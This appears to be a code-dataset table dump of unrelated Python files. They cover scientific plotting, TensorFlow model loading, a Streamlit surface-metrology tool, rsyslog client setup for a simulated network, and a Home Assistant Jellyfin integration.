| id (stringlengths 1–265) | text (stringlengths 6–5.19M) | dataset_id (stringclasses, 7 values) |
---|---|---|
21410 | from pylab import *
import tables
def exactSol(X, Y, t):
return exp(-2*t)*sin(X)*cos(Y)
fh = tables.openFile("s251-dg-diffuse-2d_q_1.h5")
q = fh.root.StructGridField
nx, ny, nc = q.shape
dx = 2*pi/nx
Xf = linspace(0, 2*pi-dx, nx)
dy = 2*pi/ny
Yf = linspace(0, 2*pi-dy, ny)
XX, YY = meshgrid(Xf, Yf)
Xhr = linspace(0, 2*pi, 101)
Yhr = linspace(0, 2*pi, 101)
XXhr, YYhr = meshgrid(Xhr, Yhr)
fhr = exactSol(XXhr, YYhr, 1.0)
figure(1)
pcolormesh(Xhr, Yhr, fhr)
colorbar()
figure(2)
pcolormesh(Xf, Yf, q[:,:,0])
colorbar()
# compute error
fex = exactSol(XX, YY, 1.0)
error = abs(fex.transpose()-q[:,:,0]).sum()/(nx*ny);
print "%g %g" % (dx, error)
def evalSum(coeff, fields):
res = 0.0*fields[0]
for i in range(len(coeff)):
res = res + coeff[i]*fields[i]
return res
def projectOnFinerGrid_f24(Xc, Yc, q):
dx = Xc[1]-Xc[0]
dy = Yc[1]-Yc[0]
nx = Xc.shape[0]
ny = Yc.shape[0]
# mesh coordinates
Xn = linspace(Xc[0]-0.5*dx, Xc[-1]+0.5*dx, 2*nx+1) # one more
Yn = linspace(Yc[0]-0.5*dy, Yc[-1]+0.5*dy, 2*ny+1) # one more
XXn, YYn = meshgrid(Xn, Yn)
# data
qn = zeros((2*Xc.shape[0], 2*Yc.shape[0]), float)
v1 = q[:,:,0]
v2 = q[:,:,1]
v3 = q[:,:,2]
v4 = q[:,:,3]
vList = [v1,v2,v3,v4]
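# Note: the coefficient sets c1..c4 below appear to be bilinear interpolation
# weights evaluated at the four quarter-points of each cell (tensor products of
# 3/4 and 1/4: 0.75*0.75 = 0.5625, 0.75*0.25 = 0.1875, 0.25*0.25 = 0.0625),
# used to project the four nodal values onto the 2x finer grid.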
# node 1
c1 = [0.5625,0.1875,0.0625,0.1875]
qn[0:2*nx:2, 0:2*ny:2] = evalSum(c1, vList)
# node 2
c2 = [0.1875,0.5625,0.1875,0.0625]
qn[1:2*nx:2, 0:2*ny:2] = evalSum(c2, vList)
# node 3
c3 = [0.1875,0.0625,0.1875,0.5625]
qn[0:2*nx:2, 1:2*ny:2] = evalSum(c3, vList)
# node 4
c4 = [0.0625,0.1875,0.5625,0.1875]
qn[1:2*nx:2, 1:2*ny:2] = evalSum(c4, vList)
return XXn, YYn, qn
Xc = linspace(0.5*dx, 2*pi-0.5*dx, nx)
Yc = linspace(0.5*dy, 2*pi-0.5*dy, ny)
Xp, Yp, qp = projectOnFinerGrid_f24(Xc, Yc, q)
figure(1)
subplot(1,2,1)
pcolormesh(Xp, Yp, transpose(qp))
title('RDG t=1')
colorbar(shrink=0.5)
axis('image')
subplot(1,2,2)
pcolormesh(Xhr, Yhr, fhr)
title('Exact t=1')
colorbar(shrink=0.5)
axis('image')
savefig('s251-exact-cmp.png')
show()
| StarcoderdataPython |
1798253 | <reponame>AntoninoScala/air-water-vv<filename>2d/caissonBreakwater/fixed/geometryPlot.py
from numpy import *
import numpy as np  # needed below: the vertex arrays are created with np.array(...)
from scipy import *
from pylab import *
import collections as cll
import csv
# Put tankVertices and caissonVertices arrays here
#tankVertices
tv=np.array([[0.0, 0.0],
[0.38992935246580784, 0.0],
[1.1697880573974235, 0.0],
[1.3197880573974234, 0.075],
[2.0197880573974234, 0.075],
[2.1697880573974233, 0.0],
[2.949646762329039, 0.0],
[3.7295054672606547, 0.0],
[3.7295054672606547, 1.0],
[2.949646762329039, 1.0],
[0.38992935246580784, 1.0],
[0.0, 1.0],],
)
nt=len(tv)
#caissonVertices
cv=np.array( [[ 1.44978806, 0.075 ],
[ 1.88978806, 0.075 ],
[ 1.88978806, 0.475 ],
[ 1.44978806, 0.475 ]],
)
nc=len(cv)
xt=[]
yt=[]
xc=[]
yc=[]
for i in range(nt):
xt.append(tv[i][0])
yt.append(tv[i][1])
#xt.append(tv[0][0])
#yt.append(tv[0][1])
for j in range(nc):
xc.append(cv[j][0])
yc.append(cv[j][1])
xc.append(cv[0][0])
yc.append(cv[0][1])
# Plot geometry
import matplotlib.pyplot as plt
plt.plot(xt,yt)
plt.plot(xc,yc)
plt.xlabel('x [m]')
plt.ylabel('y [m]')
plt.suptitle('geometry')
plt.savefig('geometry.png')  # save before show() so the saved figure is not empty
plt.show()
| StarcoderdataPython |
3353433 | import tensorflow as tf
class Predict(object):
def __init__(self, path1, path2):
self.graph = tf.Graph()
with self.graph.as_default():
self.saver = tf.train.import_meta_graph(path1)
self.sess = tf.Session(graph=self.graph)
with self.sess.as_default():
with self.graph.as_default():
self.saver.restore(self.sess, path2)
def predict1(self, batch):
y = self.graph.get_tensor_by_name('Softmax:0')
proba = self.graph.get_tensor_by_name('Add_1:0')
X = self.graph.get_operation_by_name('X').outputs[0]
keep_prob = self.graph.get_operation_by_name('keep_prob').outputs[0]
cnn_logits, pre_pro = self.sess.run([proba, y], feed_dict={X: batch, keep_prob: 1.0})
return cnn_logits, pre_pro
def predict2(self, batch):
# tf.reset_default_graph()
y = self.graph.get_tensor_by_name('Softmax:0')
proba = self.graph.get_tensor_by_name('add:0')
X = self.graph.get_operation_by_name('X').outputs[0]
# batch = batch.reshape((batch_size, timesteps, num_input))
rnn_logits, pre_pro = self.sess.run([proba, y], feed_dict={X: batch})
return rnn_logits, pre_pro
def predict_models():
class DataSets(object):
pass
pre_label = DataSets()
pre_label.cnn = Predict('/home/asdf/Documents/juyan/paper/salinas/mdcpe_result/newmdcpe/model/cnn/'
'CNN0507.ckpt.meta',
'/home/asdf/Documents/juyan/paper/salinas/mdcpe_result/newmdcpe/model/cnn/'
'CNN0507.ckpt')
pre_label.rnn = Predict('/home/asdf/Documents/juyan/paper/salinas/mdcpe_result/newmdcpe/model/rnn/'
'RNN0507.ckpt.meta',
'/home/asdf/Documents/juyan/paper/salinas/mdcpe_result/newmdcpe/model/rnn/'
'RNN0507.ckpt')
return pre_label | StarcoderdataPython |
155419 | <reponame>Jesse-Redford/SurfaceMetrology
import os
import cv2
import glob
import time
import h5py
import imageio
import numpy as np
import pandas as pd
from PIL import Image
import streamlit as st
from src.ISO251782 import iso25178
from sklearn.impute import KNNImputer
def external_folder_selector(folder_path):
print(folder_path)
filenames = glob.glob(folder_path)
selected_filename = st.selectbox('Select a folder', filenames)
return os.path.join(folder_path, selected_filename)
def folder_selector(folder_path='.'):
filenames = glob.glob(r'./Datasets/MultiClass/*')
selected_filename = st.selectbox('Select a folder', filenames)
return os.path.join(folder_path, selected_filename)
def file_selector(folder_path='.'):
filenames = [os.path.join(path, name) for path, subdirs, files in os.walk(folder_path) for name in files]
selected_filename = st.selectbox('Select a file', filenames)
return selected_filename
def to_dict(tup, di={}):
di = dict(tup)
return di
# %% loader function % https://gist.github.com/g-s-k/ccffb1e84df065a690e554f4b40cfd3a
def datx2py(file_name):
# unpack an h5 group into a dict
def _group2dict(obj):
return {k: _decode_h5(v) for k, v in zip(obj.keys(), obj.values())}
# unpack a numpy structured array into a dict
def _struct2dict(obj):
names = obj.dtype.names
return [dict(zip(names, _decode_h5(record))) for record in obj]
# decode h5py.File object and all of its elements recursively
def _decode_h5(obj):
# group -> dict
if isinstance(obj, h5py.Group):
d = _group2dict(obj)
if len(obj.attrs):
d['attrs'] = _decode_h5(obj.attrs)
return d
# attributes -> dict
elif isinstance(obj, h5py.AttributeManager):
return _group2dict(obj)
# dataset -> numpy array if not empty
elif isinstance(obj, h5py.Dataset):
d = {'attrs': _decode_h5(obj.attrs)}
try:
d['vals'] = obj[()]
except (OSError, TypeError):
pass
return d
# numpy array -> unpack if possible
elif isinstance(obj, np.ndarray):
if np.issubdtype(obj.dtype, np.number) and obj.shape == (1,):
return obj[0]
elif obj.dtype == 'object':
return _decode_h5([_decode_h5(o) for o in obj])
elif np.issubdtype(obj.dtype, np.void):
return _decode_h5(_struct2dict(obj))
else:
return obj
# dimension converter -> dict
elif isinstance(obj, np.void):
return _decode_h5([_decode_h5(o) for o in obj])
# bytes -> str
elif isinstance(obj, bytes):
return obj.decode()
# collection -> unpack if length is 1
elif isinstance(obj, list) or isinstance(obj, tuple):
if len(obj) == 1:
return obj[0]
else:
return obj
# other stuff
else:
return obj
# open the file and decode it
with h5py.File(file_name, 'r') as f:
h5data = _decode_h5(f)
zdata = h5data['Data']['Surface']
zdata = list(zdata.values())[0]
zvals = zdata['vals']
zvals[zvals == zdata['attrs']['No Data']] = np.nan
# get units
zunit = zdata['attrs']['Z Converter']['BaseUnit']
# Fill nans use global mean
#zvals[np.isnan(zvals)] = np.nanmean(zvals)
#return zvals
# Fill nans using KNN imputation
imputer = KNNImputer(n_neighbors=10,missing_values=np.nan)
zzvals = imputer.fit_transform(zvals)
return np.ascontiguousarray(zzvals, dtype=np.float64)
def app():
st.title('Dataset Compiler')
st.write('Created by <NAME>')
if st.checkbox('External Folder'):
path = st.text_input('Enter Path to Dataset')
foldername = external_folder_selector(path)
else:
foldername = folder_selector()
st.write('You selected `%s`' % foldername)
filename = file_selector(folder_path=foldername)
st.write('You selected `%s`' % filename)
if filename:
z = None
loaded_image = None
if filename.endswith('.datx'):
z = datx2py(filename)
loaded_image = cv2.normalize(z, z, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U) # for displaying on st.image
elif filename.lower().endswith('.tiff'):
z = np.asarray(imageio.imread(filename))
loaded_image = cv2.normalize(z,z,0,255, cv2.NORM_MINMAX,cv2.CV_8U) # for displaying on st.image
elif filename.lower().endswith(('.bmp','.png', '.jpg', '.jpeg')):
z = np.asarray(Image.open(filename, mode='r').convert('L'))
loaded_image = Image.open(filename, mode='r')
else:
print('File type not accepted')
col1, col2,col3 = st.columns([3,1,3])
with col1:
st.write("Source")
st.image(loaded_image, caption=f"{filename} {str(z.dtype)} {str(z.shape)}", width=250)
with col2:
st.write("")
with col3:
st.write("Converted")
if len(z.shape) > 2: # if RGB apply luma transform
z = (0.2989 * z[:,:,0] + 0.5870 * z[:,:,1] + 0.114 * z[:,:,2])
loaded_image = cv2.normalize(z, z, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)
st.image(loaded_image, caption= f'Converted data is displayed in 8bit for preview, actual dtype: {str(z.dtype)} {str(z.shape)}', width=250)
st.write(z.dtype, z.shape)
st.subheader('Select Features To Compute on Dataset')
iso = iso25178()
selected_parameters = []
for par_type in iso.parameter_types:
if st.checkbox(f'{par_type} ({str(len(getattr(iso, par_type)))})'):
selected_parameters += getattr(iso, par_type)
user_pars = st.multiselect('Selected Parameters', selected_parameters, selected_parameters)
# Show options to modify polar plot defaults if any polar plot parameters are selected by user
if any(x in iso.polarplot_parameters for x in user_pars):
st.write('Set PolarPlot Parameters')
c1,c2 = st.columns(2)
if st.checkbox('Use Nan Masking for Polar Plot'):
iso.pp_mask = True
else:
iso.pp_mask = False
iso.theta_step = st.number_input('Enter rotation increment for Polar Plot (default = 1)',min_value=.1,max_value=1.0,value=1.0)
if st.button(f'Compute and Preview The ({str(len(user_pars))}) Selected Parameters'):
iso.parameters = user_pars
start = time.time()
features = iso.compute_features(z)
end = time.time()
col1, col2 = st.columns([3, 3])
col1.image(loaded_image, width=250)
col1.write(f'Processing Time: {round(end-start,3)} seconds')
col2.dataframe(pd.DataFrame(features),height=250)
dataset_name = st.text_input('Input the name of the dataset here:')
if st.button('Generate Dataset'):
iso.parameters = user_pars #iso_pars
rootdir = foldername
folder = []
filename = []
for file in os.listdir(rootdir):
folder_path = os.path.join(rootdir, file)
if os.path.isdir(folder_path):
folder_name = os.path.basename(folder_path)
for img_file in sorted(os.listdir(folder_path)):
folder.append(folder_name)
filename.append(folder_name + '/' + img_file)
df_reff = pd.DataFrame({'label': folder, 'image': filename})
df = pd.DataFrame(columns=iso.parameters)
progress_bar = st.progress(0)
for i, image in enumerate(df_reff.image):
progress_bar.progress(i / len(df_reff.image))
# open the image according to file type
filename = foldername + '/' + image
if filename.endswith('.datx'):
z = datx2py(filename)
elif filename.lower().endswith(('.tiff', '.tif')):
z = np.asarray(imageio.imread(filename))
if len(z.shape) > 2: # if RGB apply luma transform
z = (0.2989 * z[:, :, 0] + 0.5870 * z[:, :, 1] + 0.114 * z[:, :, 2])
elif filename.lower().endswith(('.bmp', '.png', '.jpg', '.jpeg')):
z = np.asarray(Image.open(filename, mode='r').convert('L'))
else:
print('File type not accepted')
# compute selected features on data and add new values to dataframe
features = to_dict(iso.compute_features(z))
df = df.append(features, ignore_index=True)
df = df_reff.join(df)
# save data as pickle file and display on console
df.to_pickle(os.path.join(os.getcwd(), 'Datasets', 'Tabular', dataset_name + ".pkl"))
st.subheader(dataset_name + ".pkl")
st.dataframe(df)
| StarcoderdataPython |
1783252 | <reponame>didiqu/IS_simulator
"""This file contain all functions about log configuration """
from colorama import Fore, Style
from .logic_actions_utils import execute_command, upload_file, change_fileorfolder_user_owner, restart_service
def rsyslog_client(instance, arg, verbose=True):
""" Configure rsyslog client to send log to log server on the remote instance """
facility = 1
execute_command(instance, {"command":["sed", "-i", "/imklog/s/^/#/", "/etc/rsyslog.conf"], "expected_exit_code":"0"}, verbose=False)
for log in arg["log_files"]:
file_conf = open("simulation/workstations/"+instance.name+"/"+log+".conf", "w", encoding="utf-8")
if log == "authentication":
file_conf.write("auth,authpriv.* @"+arg["ip_log_server"]+":5001\n")
if log == "mail":
file_conf.write("mail.* @"+arg["ip_log_server"]+":5001\n")
if log == "apache2":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/apache2/access.log\" Tag=\"http_access\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/apache2/error.log\" Tag=\"http_error\" Severity=\"error\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "iptables":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/ulog/syslogemu.log\" Tag=\"iptables\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "squid":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/squid/access.log\" Tag=\"http_access\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/squid/cache.log\" Tag=\"http_cache\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "snort":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/snort/alert\" Tag=\"snort\" Severity=\"alert\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "suricata":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/suricata/fast.log\" Tag=\"suricata\" Severity=\"alert\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "ldap":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/slapd.log\" Tag=\"slapd\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "samba":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/samba/samba.log\" Tag=\"samba\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
if log == "motion":
file_conf.write("module(load=\"imfile\" PollingInterval=\"10\") \n")
file_conf.write("input(type=\"imfile\" File=\"/var/log/motion/motion.log\" Tag=\"motion\" Severity=\"info\" Facility=\"local"+str(facility)+"\") \n")
file_conf.write("local"+str(facility)+".* @"+arg["ip_log_server"]+":5001 \n")
file_conf.close()
if upload_file(instance, {"instance_path":"/etc/rsyslog.d/"+log+".conf", "host_manager_path":"simulation/workstations/"+instance.name+"/"+log+".conf"}, verbose=False) == 1:
return 1
if change_fileorfolder_user_owner(instance, {"new_owner":"syslog", "file_path":"/etc/rsyslog.d/"+log+".conf"}, verbose=False) == 1:
return 1
if restart_service(instance, {"service":"rsyslog"}, verbose=False) == 1:
return 1
if verbose:
print(Fore.GREEN+" Install and configure rsyslog client successfully!"+Style.RESET_ALL)
return 0
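# Hypothetical usage sketch (not part of the original module): `instance` is
# assumed to be a container/VM handle accepted by execute_command/upload_file,
# and `arg` follows the structure read above -- an "ip_log_server" address plus
# a "log_files" list drawn from the names handled in the loop.
#
# rsyslog_client(instance, {
#     "ip_log_server": "10.0.0.10",
#     "log_files": ["authentication", "apache2", "iptables"],
# })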
| StarcoderdataPython |
1602232 | <reponame>Sim7b/jellyfin_ha<filename>__init__.py
"""The jellyfin component."""
import logging
import time
import re
import traceback
import collections.abc
from typing import Mapping, MutableMapping, Optional, Sequence, Iterable, List, Tuple
import voluptuous as vol
from homeassistant.exceptions import ConfigEntryNotReady
from jellyfin_apiclient_python import JellyfinClient
from jellyfin_apiclient_python.connection_manager import CONNECTION_STATE
from homeassistant.core import HomeAssistant
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ( # pylint: disable=import-error
ATTR_ENTITY_ID,
CONF_URL,
CONF_USERNAME,
CONF_PASSWORD,
CONF_VERIFY_SSL,
CONF_CLIENT_ID,
EVENT_HOMEASSISTANT_STOP,
)
import homeassistant.helpers.config_validation as cv # pylint: disable=import-error
from homeassistant.helpers.dispatcher import ( # pylint: disable=import-error
async_dispatcher_send,
)
from .const import (
DOMAIN,
SIGNAL_STATE_UPDATED,
SERVICE_SCAN,
STATE_OFF,
STATE_IDLE,
STATE_PAUSED,
STATE_PLAYING,
)
from .device import JellyfinDevice
_LOGGER = logging.getLogger(__name__)
PLATFORMS = ["sensor", "media_player"]
UPDATE_UNLISTENER = None
USER_APP_NAME = "Home Assistant"
CLIENT_VERSION = "1.0"
PATH_REGEX = re.compile("^(https?://)?([^/:]+)(:[0-9]+)?(/.*)?$")
SCAN_SERVICE_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_id,
}
)
def autolog(message):
"Automatically log the current function details."
import inspect
# Get the previous frame in the stack, otherwise it would
# be this function!!!
func = inspect.currentframe().f_back.f_code
# Dump the message + the name of this function to the log.
_LOGGER.debug("%s: %s in %s:%i" % (
message,
func.co_name,
func.co_filename,
func.co_firstlineno
))
async def async_setup(hass: HomeAssistant, config: dict):
if DOMAIN not in hass.data:
hass.data[DOMAIN] = {}
return True
async def async_setup_entry(hass: HomeAssistant, config_entry: ConfigEntry):
global UPDATE_UNLISTENER
if UPDATE_UNLISTENER:
UPDATE_UNLISTENER()
if not config_entry.unique_id:
hass.config_entries.async_update_entry(
config_entry, unique_id=config_entry.title
)
config = {}
for key, value in config_entry.data.items():
config[key] = value
for key, value in config_entry.options.items():
config[key] = value
if config_entry.options:
hass.config_entries.async_update_entry(config_entry, data=config, options={})
UPDATE_UNLISTENER = config_entry.add_update_listener(_update_listener)
hass.data[DOMAIN][config.get(CONF_URL)] = {}
_jelly = JellyfinClientManager(hass, config)
try:
await _jelly.connect()
hass.data[DOMAIN][config.get(CONF_URL)]["manager"] = _jelly
except:
_LOGGER.error("Cannot connect to Jellyfin server.")
raise
async def service_trigger_scan(service):
entity_id = service.data.get(ATTR_ENTITY_ID)
for sensor in hass.data[DOMAIN][config.get(CONF_URL)]["sensor"]["entities"]:
if sensor.entity_id == entity_id:
await sensor.async_trigger_scan()
hass.services.async_register(
DOMAIN,
SERVICE_SCAN,
service_trigger_scan,
schema=SCAN_SERVICE_SCHEMA,
)
for component in PLATFORMS:
hass.data[DOMAIN][config.get(CONF_URL)][component] = {}
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, component)
)
async_dispatcher_send(hass, SIGNAL_STATE_UPDATED)
async def stop_jellyfin(event):
"""Stop Jellyfin connection."""
await _jelly.stop()
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_jellyfin)
await _jelly.start()
return True
async def _update_listener(hass, config_entry):
"""Update listener."""
await hass.config_entries.async_reload(config_entry.entry_id)
class JellyfinClientManager(object):
def __init__(self, hass: HomeAssistant, config_entry):
self.hass = hass
self.callback = lambda client, event_name, data: None
self.jf_client: JellyfinClient = None
self.is_stopping = True
self._event_loop = hass.loop
self.host = config_entry[CONF_URL]
self._info = None
self.config_entry = config_entry
self.server_url = ""
self._sessions = None
self._devices: Mapping[str, JellyfinDevice] = {}
# Callbacks
self._new_devices_callbacks = []
self._stale_devices_callbacks = []
self._update_callbacks = []
@staticmethod
def expo(max_value = None):
n = 0
while True:
a = 2 ** n
if max_value is None or a < max_value:
yield a
n += 1
else:
yield max_value
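# Example: expo(100) yields 1, 2, 4, 8, ..., 64, then 100 forever -- used below
# as a capped exponential backoff between reconnect attempts.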
@staticmethod
def clean_none_dict_values(obj):
"""
Recursively remove keys with a value of None
"""
if not isinstance(obj, collections.abc.Iterable) or isinstance(obj, str):
return obj
queue = [obj]
while queue:
item = queue.pop()
if isinstance(item, collections.abc.Mapping):
mutable = isinstance(item, collections.abc.MutableMapping)
remove = []
for key, value in item.items():
if value is None and mutable:
remove.append(key)
elif isinstance(value, str):
continue
elif isinstance(value, collections.abc.Iterable):
queue.append(value)
if mutable:
# Remove keys with None value
for key in remove:
item.pop(key)
elif isinstance(item, collections.abc.Iterable):
for value in item:
if value is None or isinstance(value, str):
continue
elif isinstance(value, collections.abc.Iterable):
queue.append(value)
return obj
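# For example: clean_none_dict_values({"a": None, "b": [{"c": None, "d": 1}]})
# returns {"b": [{"d": 1}]} -- None-valued keys are stripped in place, recursively.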
async def connect(self):
autolog(">>>")
is_logged_in = await self.hass.async_add_executor_job(self.login)
if is_logged_in:
_LOGGER.info("Successfully added server.")
else:
raise ConfigEntryNotReady
@staticmethod
def client_factory(config_entry):
client = JellyfinClient(allow_multiple_clients=True)
client.config.data["app.default"] = True
client.config.app(
USER_APP_NAME, CLIENT_VERSION, USER_APP_NAME, config_entry[CONF_CLIENT_ID]
)
client.config.data["auth.ssl"] = config_entry[CONF_VERIFY_SSL]
return client
def login(self):
autolog(">>>")
self.server_url = self.config_entry[CONF_URL]
if self.server_url.endswith("/"):
self.server_url = self.server_url[:-1]
protocol, host, port, path = PATH_REGEX.match(self.server_url).groups()
if not protocol:
_LOGGER.warning("Adding http:// because it was not provided.")
protocol = "http://"
if protocol == "http://" and not port:
_LOGGER.warning("Adding port 8096 for insecure local http connection.")
_LOGGER.warning(
"If you want to connect to standard http port 80, use :80 in the url."
)
port = ":8096"
if protocol == "https://" and not port:
port = ":443"
self.server_url = "".join(filter(bool, (protocol, host, port, path)))
self.jf_client = self.client_factory(self.config_entry)
self.jf_client.auth.connect_to_address(self.server_url)
result = self.jf_client.auth.login(self.server_url, self.config_entry[CONF_USERNAME], self.config_entry[CONF_PASSWORD])
if "AccessToken" not in result:
return False
credentials = self.jf_client.auth.credentials.get_credentials()
self.jf_client.authenticate(credentials)
return True
async def start(self):
autolog(">>>")
def event(event_name, data):
_LOGGER.debug("Event: %s", event_name)
if event_name == "WebSocketConnect":
self.jf_client.wsc.send("SessionsStart", "0,1500")
elif event_name == "WebSocketDisconnect":
timeout_gen = self.expo(100)
while not self.is_stopping:
timeout = next(timeout_gen)
_LOGGER.warning(
"No connection to server. Next try in {0} second(s)".format(
timeout
)
)
self.jf_client.stop()
time.sleep(timeout)
if self.login():
break
elif event_name == "Sessions":
self._sessions = self.clean_none_dict_values(data)["value"]
self.update_device_list()
else:
self.callback(self.jf_client, event_name, data)
self.jf_client.callback = event
self.jf_client.callback_ws = event
await self.hass.async_add_executor_job(self.jf_client.start, True)
self.is_stopping = False
self._info = await self.hass.async_add_executor_job(self.jf_client.jellyfin._get, "System/Info")
self._sessions = self.clean_none_dict_values(await self.hass.async_add_executor_job(self.jf_client.jellyfin.get_sessions))
async def stop(self):
autolog(">>>")
await self.hass.async_add_executor_job(self.jf_client.stop)
self.is_stopping = True
def update_device_list(self):
""" Update device list. """
autolog(">>>")
# _LOGGER.debug("sessions: %s", str(sessions))
if self._sessions is None:
_LOGGER.error('Error updating Jellyfin devices.')
return
try:
new_devices = []
active_devices = []
dev_update = False
for device in self._sessions:
# _LOGGER.debug("device: %s", str(device))
dev_name = '{}.{}'.format(device['DeviceId'], device['Client'])
try:
_LOGGER.debug('Session msg on %s of type: %s, themeflag: %s',
dev_name, device['NowPlayingItem']['Type'],
device['NowPlayingItem']['IsThemeMedia'])
except KeyError:
pass
active_devices.append(dev_name)
if dev_name not in self._devices and \
device['DeviceId'] != self.config_entry[CONF_CLIENT_ID]:
_LOGGER.debug('New Jellyfin DeviceID: %s. Adding to device list.',
dev_name)
new = JellyfinDevice(device, self)
self._devices[dev_name] = new
new_devices.append(new)
elif device['DeviceId'] != self.config_entry[CONF_CLIENT_ID]:
# Before we send in new data check for changes to state
# to decide if we need to fire the update callback
if not self._devices[dev_name].is_active:
# Device wasn't active on the last update
# We need to fire a device callback to let subs now
dev_update = True
do_update = self.update_check(
self._devices[dev_name], device)
self._devices[dev_name].update_data(device)
self._devices[dev_name].set_active(True)
if dev_update:
self._do_new_devices_callback(0)
dev_update = False
if do_update:
self._do_update_callback(dev_name)
# Need to check for new inactive devices and flag
for dev_id in self._devices:
if dev_id not in active_devices:
# Device no longer active
if self._devices[dev_id].is_active:
self._devices[dev_id].set_active(False)
self._do_update_callback(dev_id)
self._do_stale_devices_callback(dev_id)
# Call device callback if new devices were found.
if new_devices:
self._do_new_devices_callback(0)
except Exception as e:
_LOGGER.critical(traceback.format_exc())
raise
def update_check(self, existing: JellyfinDevice, new: JellyfinDevice):
""" Check device state to see if we need to fire the callback.
True if either state is 'Playing'
False if both states are: 'Paused', 'Idle', or 'Off'
True on any state transition.
"""
autolog(">>>")
old_state = existing.state
if 'NowPlayingItem' in existing.session_raw:
try:
old_theme = existing.session_raw['NowPlayingItem']['IsThemeMedia']
except KeyError:
old_theme = False
else:
old_theme = False
if 'NowPlayingItem' in new:
if new['PlayState']['IsPaused']:
new_state = STATE_PAUSED
else:
new_state = STATE_PLAYING
try:
new_theme = new['NowPlayingItem']['IsThemeMedia']
except KeyError:
new_theme = False
else:
new_state = STATE_IDLE
new_theme = False
if old_theme or new_theme:
return False
elif old_state == STATE_PLAYING or new_state == STATE_PLAYING:
return True
elif old_state != new_state:
return True
else:
return False
@property
def info(self):
if self.is_stopping:
return None
return self._info
async def trigger_scan(self):
await self.hass.async_add_executor_job(self.jf_client.jellyfin._post, "Library/Refresh")
async def get_item(self, id):
return await self.hass.async_add_executor_job(self.jf_client.jellyfin.get_item, id)
async def get_items(self, query=None):
response = await self.hass.async_add_executor_job(self.jf_client.jellyfin.users, "/Items", "GET", query)
#_LOGGER.debug("get_items: %s | %s", str(query), str(response))
return response["Items"]
async def set_playstate(self, session_id, state, params):
await self.hass.async_add_executor_job(self.jf_client.jellyfin.post_session, session_id, "Playing/%s" % state, params)
async def play_media(self, session_id, media_id):
params = {
"playCommand": "PlayNow",
"itemIds": media_id
}
await self.hass.async_add_executor_job(self.jf_client.jellyfin.post_session, session_id, "Playing", params)
async def get_artwork(self, media_id) -> Tuple[Optional[str], Optional[str]]:
query = {
"format": "PNG",
"maxWidth": 500,
"maxHeight": 500
}
image = await self.hass.async_add_executor_job(self.jf_client.jellyfin.items, "GET", "%s/Images/Primary" % media_id, query)
if image is not None:
return (image, "image/png")
return (None, None)
async def get_artwork_url(self, media_id) -> str:
return await self.hass.async_add_executor_job(self.jf_client.jellyfin.artwork, media_id, "Primary", 500)
@property
def api(self):
""" Return the api. """
return self.jf_client.jellyfin
@property
def devices(self) -> Mapping[str, JellyfinDevice]:
""" Return devices dictionary. """
return self._devices
@property
def is_available(self):
return not self.is_stopping
# Callbacks
def add_new_devices_callback(self, callback):
"""Register as callback for when new devices are added. """
self._new_devices_callbacks.append(callback)
_LOGGER.debug('Added new devices callback to %s', callback)
def _do_new_devices_callback(self, msg):
"""Call registered callback functions."""
for callback in self._new_devices_callbacks:
_LOGGER.debug('Devices callback %s', callback)
self._event_loop.call_soon(callback, msg)
def add_stale_devices_callback(self, callback):
"""Register as callback for when stale devices exist. """
self._stale_devices_callbacks.append(callback)
_LOGGER.debug('Added stale devices callback to %s', callback)
def _do_stale_devices_callback(self, msg):
"""Call registered callback functions."""
for callback in self._stale_devices_callbacks:
_LOGGER.debug('Stale Devices callback %s', callback)
self._event_loop.call_soon(callback, msg)
def add_update_callback(self, callback, device):
"""Register as callback for when a matching device changes."""
self._update_callbacks.append([callback, device])
_LOGGER.debug('Added update callback to %s on %s', callback, device)
def remove_update_callback(self, callback, device):
""" Remove a registered update callback. """
if [callback, device] in self._update_callbacks:
self._update_callbacks.remove([callback, device])
_LOGGER.debug('Removed update callback %s for %s',
callback, device)
def _do_update_callback(self, msg):
"""Call registered callback functions."""
for callback, device in self._update_callbacks:
if device == msg:
_LOGGER.debug('Update callback %s for device %s by %s',
callback, device, msg)
self._event_loop.call_soon(callback, msg)
| StarcoderdataPython |
1672534 | #-------------------------------------------------------
# Appendix 2: control an LED from a web page
#-------------------------------------------------------
"""
